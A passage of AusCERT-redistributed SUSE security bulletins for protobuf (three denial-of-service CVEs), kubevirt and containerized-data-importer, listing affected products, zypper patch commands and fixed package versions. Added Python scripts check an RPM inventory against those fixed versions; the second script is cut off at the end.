SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS
SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS
SUSE Linux Enterprise High Performance Computing 15-SP3
SUSE Linux Enterprise High Performance Computing 15-SP4
SUSE Linux Enterprise Installer 15-SP2
SUSE Linux Enterprise Micro 5.1
SUSE Linux Enterprise Micro 5.2
SUSE Linux Enterprise Micro 5.3
SUSE Linux Enterprise Module for Basesystem 15-SP3
SUSE Linux Enterprise Module for Basesystem 15-SP4
SUSE Linux Enterprise Module for Development Tools 15-SP3
SUSE Linux Enterprise Module for Development Tools 15-SP4
SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP3
SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP4
SUSE Linux Enterprise Module for Public Cloud 15-SP2
SUSE Linux Enterprise Module for Public Cloud 15-SP3
SUSE Linux Enterprise Module for Public Cloud 15-SP4
SUSE Linux Enterprise Module for SUSE Manager Server 4.1
SUSE Linux Enterprise Module for SUSE Manager Server 4.2
SUSE Linux Enterprise Module for SUSE Manager Server 4.3
SUSE Linux Enterprise Server 15-SP2
SUSE Linux Enterprise Server 15-SP2-BCL
SUSE Linux Enterprise Server 15-SP2-LTSS
SUSE Linux Enterprise Server 15-SP3
SUSE Linux Enterprise Server 15-SP4
SUSE Linux Enterprise Server for SAP 15-SP2
SUSE Linux Enterprise Server for SAP Applications 15-SP2
SUSE Linux Enterprise Server for SAP Applications 15-SP3
SUSE Linux Enterprise Server for SAP Applications 15-SP4
SUSE Manager Proxy 4.1
SUSE Manager Proxy 4.2
SUSE Manager Proxy 4.3
SUSE Manager Retail Branch Server 4.1
SUSE Manager Retail Branch Server 4.2
SUSE Manager Retail Branch Server 4.3
SUSE Manager Server 4.1
SUSE Manager Server 4.2
SUSE Manager Server 4.3
openSUSE Leap 15.3
openSUSE Leap 15.4
openSUSE Leap Micro 5.2
______________________________________________________________________________
An update that fixes three vulnerabilities is now available.
Description:
This update for protobuf fixes the following issues:
o CVE-2021-22569: Fixed a denial of service in protobuf-java in the parsing
procedure for binary data (bsc#1194530).
o CVE-2022-1941: Fixed a potential DoS issue in protobuf-cpp and
protobuf-python (bsc#1203681).
o CVE-2022-3171: Fixed a potential DoS issue when parsing binary data in
protobuf-java (bsc#1204256).
Patch Instructions:
To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:
o openSUSE Leap Micro 5.2:
zypper in -t patch openSUSE-Leap-Micro-5.2-2022-3922=1
o openSUSE Leap 15.4:
zypper in -t patch openSUSE-SLE-15.4-2022-3922=1
o openSUSE Leap 15.3:
zypper in -t patch openSUSE-SLE-15.3-2022-3922=1
o SUSE Manager Server 4.1:
zypper in -t patch SUSE-SLE-Product-SUSE-Manager-Server-4.1-2022-3922=1
o SUSE Manager Retail Branch Server 4.1:
zypper in -t patch SUSE-SLE-Product-SUSE-Manager-Retail-Branch-Server-4.1-2022-3922=1
o SUSE Manager Proxy 4.1:
zypper in -t patch SUSE-SLE-Product-SUSE-Manager-Proxy-4.1-2022-3922=1
o SUSE Linux Enterprise Server for SAP 15-SP2:
zypper in -t patch SUSE-SLE-Product-SLES_SAP-15-SP2-2022-3922=1
o SUSE Linux Enterprise Server 15-SP2-LTSS:
zypper in -t patch SUSE-SLE-Product-SLES-15-SP2-LTSS-2022-3922=1
o SUSE Linux Enterprise Server 15-SP2-BCL:
zypper in -t patch SUSE-SLE-Product-SLES-15-SP2-BCL-2022-3922=1
o SUSE Linux Enterprise Module for SUSE Manager Server 4.3:
zypper in -t patch SUSE-SLE-Module-SUSE-Manager-Server-4.3-2022-3922=1
o SUSE Linux Enterprise Module for SUSE Manager Server 4.2:
zypper in -t patch SUSE-SLE-Module-SUSE-Manager-Server-4.2-2022-3922=1
o SUSE Linux Enterprise Module for SUSE Manager Server 4.1:
zypper in -t patch SUSE-SLE-Module-SUSE-Manager-Server-4.1-2022-3922=1
o SUSE Linux Enterprise Module for Public Cloud 15-SP4:
zypper in -t patch SUSE-SLE-Module-Public-Cloud-15-SP4-2022-3922=1
o SUSE Linux Enterprise Module for Public Cloud 15-SP3:
zypper in -t patch SUSE-SLE-Module-Public-Cloud-15-SP3-2022-3922=1
o SUSE Linux Enterprise Module for Public Cloud 15-SP2:
zypper in -t patch SUSE-SLE-Module-Public-Cloud-15-SP2-2022-3922=1
o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP4:
zypper in -t patch SUSE-SLE-Module-Packagehub-Subpackages-15-SP4-2022-3922=1
o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP3:
zypper in -t patch SUSE-SLE-Module-Packagehub-Subpackages-15-SP3-2022-3922=1
o SUSE Linux Enterprise Module for Development Tools 15-SP4:
zypper in -t patch SUSE-SLE-Module-Development-Tools-15-SP4-2022-3922=1
o SUSE Linux Enterprise Module for Development Tools 15-SP3:
zypper in -t patch SUSE-SLE-Module-Development-Tools-15-SP3-2022-3922=1
o SUSE Linux Enterprise Module for Basesystem 15-SP4:
zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP4-2022-3922=1
o SUSE Linux Enterprise Module for Basesystem 15-SP3:
zypper in -t patch SUSE-SLE-Module-Basesystem-15-SP3-2022-3922=1
o SUSE Linux Enterprise Micro 5.3:
zypper in -t patch SUSE-SLE-Micro-5.3-2022-3922=1
o SUSE Linux Enterprise Micro 5.2:
zypper in -t patch SUSE-SUSE-MicroOS-5.2-2022-3922=1
o SUSE Linux Enterprise Micro 5.1:
zypper in -t patch SUSE-SUSE-MicroOS-5.1-2022-3922=1
o SUSE Linux Enterprise Installer 15-SP2:
zypper in -t patch SUSE-SLE-INSTALLER-15-SP2-2022-3922=1
o SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS:
zypper in -t patch SUSE-SLE-Product-HPC-15-SP2-LTSS-2022-3922=1
o SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS:
zypper in -t patch SUSE-SLE-Product-HPC-15-SP2-ESPOS-2022-3922=1
o SUSE Enterprise Storage 7:
zypper in -t patch SUSE-Storage-7-2022-3922=1
Package List:
o openSUSE Leap Micro 5.2 (aarch64 x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
o openSUSE Leap 15.4 (aarch64 ppc64le s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
protobuf-java-3.9.2-150200.4.19.2
python3-protobuf-3.9.2-150200.4.19.2
o openSUSE Leap 15.4 (noarch):
protobuf-source-3.9.2-150200.4.19.2
o openSUSE Leap 15.4 (x86_64):
libprotobuf-lite20-32bit-3.9.2-150200.4.19.2
libprotobuf-lite20-32bit-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-32bit-3.9.2-150200.4.19.2
libprotobuf20-32bit-debuginfo-3.9.2-150200.4.19.2
libprotoc20-32bit-3.9.2-150200.4.19.2
libprotoc20-32bit-debuginfo-3.9.2-150200.4.19.2
o openSUSE Leap 15.3 (aarch64 ppc64le s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
protobuf-java-3.9.2-150200.4.19.2
python2-protobuf-3.9.2-150200.4.19.2
python3-protobuf-3.9.2-150200.4.19.2
o openSUSE Leap 15.3 (x86_64):
libprotobuf-lite20-32bit-3.9.2-150200.4.19.2
libprotobuf-lite20-32bit-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-32bit-3.9.2-150200.4.19.2
libprotobuf20-32bit-debuginfo-3.9.2-150200.4.19.2
libprotoc20-32bit-3.9.2-150200.4.19.2
libprotoc20-32bit-debuginfo-3.9.2-150200.4.19.2
o openSUSE Leap 15.3 (noarch):
protobuf-source-3.9.2-150200.4.19.2
o SUSE Manager Server 4.1 (ppc64le s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Manager Retail Branch Server 4.1 (x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Manager Proxy 4.1 (x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Server for SAP 15-SP2 (ppc64le x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Server 15-SP2-LTSS (aarch64 ppc64le s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Server 15-SP2-BCL (x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for SUSE Manager Server 4.3 (aarch64 ppc64le s390x x86_64):
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-java-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for SUSE Manager Server 4.2 (aarch64 ppc64le s390x x86_64):
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-java-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for SUSE Manager Server 4.1 (aarch64 ppc64le s390x x86_64):
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-java-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for Public Cloud 15-SP4 (aarch64 ppc64le s390x x86_64):
protobuf-debugsource-3.9.2-150200.4.19.2
python3-protobuf-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for Public Cloud 15-SP3 (aarch64 ppc64le s390x x86_64):
protobuf-debugsource-3.9.2-150200.4.19.2
python3-protobuf-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for Public Cloud 15-SP2 (aarch64 ppc64le s390x x86_64):
python3-protobuf-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP4 (aarch64 ppc64le s390x x86_64):
protobuf-debugsource-3.9.2-150200.4.19.2
python2-protobuf-3.9.2-150200.4.19.2
python3-protobuf-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for Packagehub Subpackages 15-SP3 (aarch64 ppc64le s390x x86_64):
protobuf-debugsource-3.9.2-150200.4.19.2
python2-protobuf-3.9.2-150200.4.19.2
python3-protobuf-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for Development Tools 15-SP4 (aarch64 ppc64le s390x x86_64):
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for Development Tools 15-SP3 (aarch64 ppc64le s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for Basesystem 15-SP4 (aarch64 ppc64le s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Module for Basesystem 15-SP3 (aarch64 ppc64le s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Micro 5.3 (aarch64 s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Micro 5.2 (aarch64 s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Micro 5.1 (aarch64 s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
o SUSE Linux Enterprise Installer 15-SP2 (aarch64 ppc64le s390x x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
o SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS (aarch64 x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS (aarch64 x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
o SUSE Enterprise Storage 7 (aarch64 x86_64):
libprotobuf-lite20-3.9.2-150200.4.19.2
libprotobuf-lite20-debuginfo-3.9.2-150200.4.19.2
libprotobuf20-3.9.2-150200.4.19.2
libprotobuf20-debuginfo-3.9.2-150200.4.19.2
libprotoc20-3.9.2-150200.4.19.2
libprotoc20-debuginfo-3.9.2-150200.4.19.2
protobuf-debugsource-3.9.2-150200.4.19.2
protobuf-devel-3.9.2-150200.4.19.2
protobuf-devel-debuginfo-3.9.2-150200.4.19.2
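Applying the patch command above is only half of remediation; the other half is confirming that every package the advisory lists is now at or above its fixed version. The following is an added example, not SUSE or AusCERT tooling: it implements RPM-style version ordering (digit runs compare numerically, alpha runs lexically, `~` sorts before anything and `^` after a bare prefix, as rpm's rpmvercmp does) and checks a package inventory against the fixed version-release strings from the SUSE-SU-2022:3922-1 package list. It assumes the inventory is lines of `<name> <version>-<release>`, as `rpm -qa --qf '%{NAME} %{VERSION}-%{RELEASE}\n'` would print; the INSTALLED sample below is constructed for the demonstration and is not real host data.

```python
"""Check an installed-package inventory against an advisory's fixed versions.

Added example (not SUSE/AusCERT code). Assumes inventory lines of the form
"<name> <version>-<release>" such as
    rpm -qa --qf '%{NAME} %{VERSION}-%{RELEASE}\n'
produces. The INSTALLED sample is constructed for the demo.
"""
import re
from itertools import zip_longest

# Fixed "version-release" strings taken from the SUSE-SU-2022:3922-1 package
# list (SUSE Linux Enterprise Server 15-SP2-LTSS entries).
FIXED = {
    "libprotobuf-lite20": "3.9.2-150200.4.19.2",
    "libprotobuf20": "3.9.2-150200.4.19.2",
    "libprotoc20": "3.9.2-150200.4.19.2",
    "protobuf-devel": "3.9.2-150200.4.19.2",
}

# Constructed sample inventory: two packages behind, one already fixed,
# one advisory package not installed at all, one unrelated package.
INSTALLED = """\
libprotobuf-lite20 3.9.2-150200.4.16.1
libprotobuf20 3.9.2-150200.4.19.2
libprotoc20 3.9.2-150200.4.19.1
python3-protobuf 3.9.2-150200.4.16.1
"""

# Version segments: digit runs, alpha runs, and the special ~ / ^ markers.
# Separators such as '.' and '_' only delimit segments, as in rpmvercmp.
_SEG = re.compile(r"[0-9]+|[a-zA-Z]+|~|\^")


def rpmvercmp(a: str, b: str) -> int:
    """Order two RPM version strings like rpm's rpmvercmp: -1, 0 or 1."""
    if a == b:
        return 0
    for x, y in zip_longest(_SEG.findall(a), _SEG.findall(b)):
        if x == y:
            continue
        # '~' sorts below everything, including the end of the string
        # (so "1.0~rc1" < "1.0").
        if x == "~" or y == "~":
            return -1 if x == "~" else 1
        # '^' sorts above the end of the string but below any real segment
        # (so "1.0^1" > "1.0" and "1.0^1" < "1.0.1").
        if x == "^" or y == "^":
            if x is None:
                return -1
            if y is None:
                return 1
            return -1 if x == "^" else 1
        # One side exhausted: the longer version is the newer one.
        if x is None:
            return -1
        if y is None:
            return 1
        xd, yd = x.isdigit(), y.isdigit()
        if xd and yd:
            xi, yi = int(x), int(y)   # numeric compare ignores leading zeros
            if xi != yi:
                return -1 if xi < yi else 1
            continue
        if xd != yd:
            return 1 if xd else -1    # a numeric segment beats an alpha one
        return -1 if x < y else 1     # both alpha: plain lexical order
    return 0


def evr_cmp(installed: str, fixed: str) -> int:
    """Compare 'version-release' strings: version first, then release."""
    iv, ir = installed.rsplit("-", 1)
    fv, fr = fixed.rsplit("-", 1)
    c = rpmvercmp(iv, fv)
    return c if c != 0 else rpmvercmp(ir, fr)


def check_inventory(inventory: str, fixed: dict) -> dict:
    """Return {name: status} for each advisory package: 'fixed',
    'vulnerable' (older than the fixed version) or 'absent'."""
    installed = {}
    for line in inventory.splitlines():
        line = line.strip()
        if not line:
            continue
        name, vr = line.split()
        installed[name] = vr
    report = {}
    for name, fixed_vr in fixed.items():
        if name not in installed:
            report[name] = "absent"
        elif evr_cmp(installed[name], fixed_vr) < 0:
            report[name] = "vulnerable"
        else:
            report[name] = "fixed"
    return report


if __name__ == "__main__":
    for name, status in check_inventory(INSTALLED, FIXED).items():
        print(f"{name}: {status}")
```

An "absent" result is not a pass: it means the package is not installed on this host (or is installed under a different name on this product), so it should be cross-checked against the per-product package list rather than ignored. Epochs are not modelled here because none of the listed packages carry one; an inventory that includes `%{EPOCH}` would need the epoch compared before the version.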
References:
o https://www.suse.com/security/cve/CVE-2021-22569.html
o https://www.suse.com/security/cve/CVE-2022-1941.html
o https://www.suse.com/security/cve/CVE-2022-3171.html
o https://bugzilla.suse.com/1194530
o https://bugzilla.suse.com/1203681
o https://bugzilla.suse.com/1204256
- --------------------------END INCLUDED TEXT--------------------
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
=6F9K
-----END PGP SIGNATURE-----
ESB-2022.5778 - [SUSE] kubevirt: CVSS (Max): None
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5778
Security update for kubevirt
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: kubevirt
Publisher: SUSE
Operating System: SUSE
Resolution: Patch/Upgrade
Original Bulletin:
https://www.suse.com/support/update/announcement/2022/suse-su-20223919-1
Comment: CVSS (Max): None available when published
- --------------------------BEGIN INCLUDED TEXT--------------------
SUSE Security Update: Security update for kubevirt
______________________________________________________________________________
Announcement ID: SUSE-SU-2022:3919-1
Rating: important
References:
Affected Products:
SUSE Enterprise Storage 7.1
SUSE Linux Enterprise High Performance Computing 15-SP3
SUSE Linux Enterprise Module for Containers 15-SP3
SUSE Linux Enterprise Server 15-SP3
SUSE Linux Enterprise Server for SAP Applications 15-SP3
SUSE Manager Proxy 4.2
SUSE Manager Retail Branch Server 4.2
SUSE Manager Server 4.2
openSUSE Leap 15.3
______________________________________________________________________________
An update that contains security fixes can now be installed.
Description:
This update rebuilds the kubevirt stack to include recent security updates in
its base containers.
Patch Instructions:
To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:
o openSUSE Leap 15.3:
zypper in -t patch openSUSE-SLE-15.3-2022-3919=1
o SUSE Linux Enterprise Module for Containers 15-SP3:
zypper in -t patch SUSE-SLE-Module-Containers-15-SP3-2022-3919=1
Package List:
o openSUSE Leap 15.3 (x86_64):
kubevirt-container-disk-0.49.0-150300.8.15.1
kubevirt-container-disk-debuginfo-0.49.0-150300.8.15.1
kubevirt-manifests-0.49.0-150300.8.15.1
kubevirt-tests-0.49.0-150300.8.15.1
kubevirt-tests-debuginfo-0.49.0-150300.8.15.1
kubevirt-virt-api-0.49.0-150300.8.15.1
kubevirt-virt-api-debuginfo-0.49.0-150300.8.15.1
kubevirt-virt-controller-0.49.0-150300.8.15.1
kubevirt-virt-controller-debuginfo-0.49.0-150300.8.15.1
kubevirt-virt-handler-0.49.0-150300.8.15.1
kubevirt-virt-handler-debuginfo-0.49.0-150300.8.15.1
kubevirt-virt-launcher-0.49.0-150300.8.15.1
kubevirt-virt-launcher-debuginfo-0.49.0-150300.8.15.1
kubevirt-virt-operator-0.49.0-150300.8.15.1
kubevirt-virt-operator-debuginfo-0.49.0-150300.8.15.1
kubevirt-virtctl-0.49.0-150300.8.15.1
kubevirt-virtctl-debuginfo-0.49.0-150300.8.15.1
obs-service-kubevirt_containers_meta-0.49.0-150300.8.15.1
o SUSE Linux Enterprise Module for Containers 15-SP3 (x86_64):
kubevirt-manifests-0.49.0-150300.8.15.1
kubevirt-virtctl-0.49.0-150300.8.15.1
kubevirt-virtctl-debuginfo-0.49.0-150300.8.15.1
References:
- --------------------------END INCLUDED TEXT--------------------
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yGp8kNZI30y1K9AQgE7hAApWsU/N3qQG1bZ6C5DA5Tns/N2VF3PGpX
OVkfxLS08Y12WqtB2HQfDHM/0UwQWlGI9hJlobQCRb07w8kjJ54zFBYPk+fI5SF4
lm7yZryQbEriX6jUxdVqiAawn26Hg27g+Y/J8TLikPKsVt5zPtaJ08wflXbOhhhe
jHp8aZP1lHpuzpks+UY0YrxCaKAq4Lof8F+ZsqKWsxiWNTObx7GYrt8it+1me9YF
js5lgM9Tx0RYJPKu27ZOru77gBCPGSZXzHCksq1L8mGyiOXj14R6hMklB4lpaSgM
R5m36o2TY3sP9Wxd6kvnfZsp5qbRH/7ngprsSkbVPWeQTMSEyV8ZlbiC/cS+gbrR
zXgsbgbyFMju/dYuuZbNXAKcIMVta0SMAS88V8zzHVSTqDggAQgmYCaeNHp0dV2P
WWp8M1z79ueFWHXcOFxyLPpCoSCHsQQRQSPLA45VxVrRNyE6liqY6KrOqzrLpRN5
GYq1Lnbep9CxfwBvUw5wzaxVp1lYj5yocJD3CZ6JVJAuiz8+DakCSjW3p0hIZesx
UL4DX+7OzD+gjMy6OaDn8G0090qeCPiud4NvsTMiqGyPl6jl4Z8kPah7M9JKKsE9
KYJfXH2xFR4h0GUppMBanxlDNXMGxINHm8ppfwV2bMO1T//eluZnYSqTXip/cmLX
kPnxfw3AvhQ=
=hcI4
-----END PGP SIGNATURE-----
ESB-2022.5777 - [SUSE] containerized data importer: CVSS (Max): None
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5777
Security update for containerized data importer
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: containerized data importer
Publisher: SUSE
Operating System: SUSE
Resolution: Patch/Upgrade
Original Bulletin:
https://www.suse.com/support/update/announcement/2022/suse-su-20223920-1
Comment: CVSS (Max): None available when published
- --------------------------BEGIN INCLUDED TEXT--------------------
SUSE Security Update: Security update for containerized data importer
______________________________________________________________________________
Announcement ID: SUSE-SU-2022:3920-1
Rating: important
References:
Affected Products:
SUSE Enterprise Storage 7.1
SUSE Linux Enterprise High Performance Computing 15-SP3
SUSE Linux Enterprise Module for Containers 15-SP3
SUSE Linux Enterprise Server 15-SP3
SUSE Linux Enterprise Server for SAP Applications 15-SP3
SUSE Manager Proxy 4.2
SUSE Manager Retail Branch Server 4.2
SUSE Manager Server 4.2
openSUSE Leap 15.3
______________________________________________________________________________
An update that contains security fixes can now be installed.
Description:
This update of containerized data importer images rebases the containers
against the current base images to resolve security issues.
Patch Instructions:
To install this SUSE Security Update use the SUSE recommended installation
methods like YaST online_update or "zypper patch".
Alternatively you can run the command listed for your product:
o openSUSE Leap 15.3:
zypper in -t patch openSUSE-SLE-15.3-2022-3920=1
o SUSE Linux Enterprise Module for Containers 15-SP3:
zypper in -t patch SUSE-SLE-Module-Containers-15-SP3-2022-3920=1
Package List:
o openSUSE Leap 15.3 (x86_64):
containerized-data-importer-api-1.43.2-150300.8.11.1
containerized-data-importer-api-debuginfo-1.43.2-150300.8.11.1
containerized-data-importer-cloner-1.43.2-150300.8.11.1
containerized-data-importer-cloner-debuginfo-1.43.2-150300.8.11.1
containerized-data-importer-controller-1.43.2-150300.8.11.1
containerized-data-importer-controller-debuginfo-1.43.2-150300.8.11.1
containerized-data-importer-importer-1.43.2-150300.8.11.1
containerized-data-importer-importer-debuginfo-1.43.2-150300.8.11.1
containerized-data-importer-manifests-1.43.2-150300.8.11.1
containerized-data-importer-operator-1.43.2-150300.8.11.1
containerized-data-importer-operator-debuginfo-1.43.2-150300.8.11.1
containerized-data-importer-uploadproxy-1.43.2-150300.8.11.1
containerized-data-importer-uploadproxy-debuginfo-1.43.2-150300.8.11.1
containerized-data-importer-uploadserver-1.43.2-150300.8.11.1
containerized-data-importer-uploadserver-debuginfo-1.43.2-150300.8.11.1
obs-service-cdi_containers_meta-1.43.2-150300.8.11.1
o SUSE Linux Enterprise Module for Containers 15-SP3 (x86_64):
containerized-data-importer-manifests-1.43.2-150300.8.11.1
References:
- --------------------------END INCLUDED TEXT--------------------
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
=7PN4
-----END PGP SIGNATURE-----
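The two SUSE bulletins above (ESB-2022.5778 / SUSE-SU-2022:3919-1 for kubevirt and ESB-2022.5777 / SUSE-SU-2022:3920-1 for containerized data importer) carry no CVE list, only the fixed package builds, so the question an operator is left with is whether the RPMs on a host are at or above those builds. The script below is an added example for this page, not SUSE or AusCERT code. It parses NAME-VERSION-RELEASE strings in the form the bulletins' package lists use, orders versions the way rpm does (a Python rendering of rpmvercmp, so that release 150300.8.12.2 sorts below 150300.8.15.1 instead of being compared as text) and reports each bulletin package as fixed, vulnerable or not installed. The INSTALLED inventory is constructed sample data shaped like the output of `rpm -qa --qf '%{NAME}-%{VERSION}-%{RELEASE}\n'`; pass a file of real output from that command as the first argument to check a host.

```python
"""Compare installed kubevirt / containerized-data-importer RPMs with the
fixed builds listed in SUSE-SU-2022:3919-1 and SUSE-SU-2022:3920-1.

Added example for this page; not SUSE or AusCERT code. INSTALLED is a
constructed sample inventory, not output from a real host.
"""
import re
import sys
from itertools import zip_longest

# Fixed NAME-VERSION-RELEASE strings copied from the two bulletins' package
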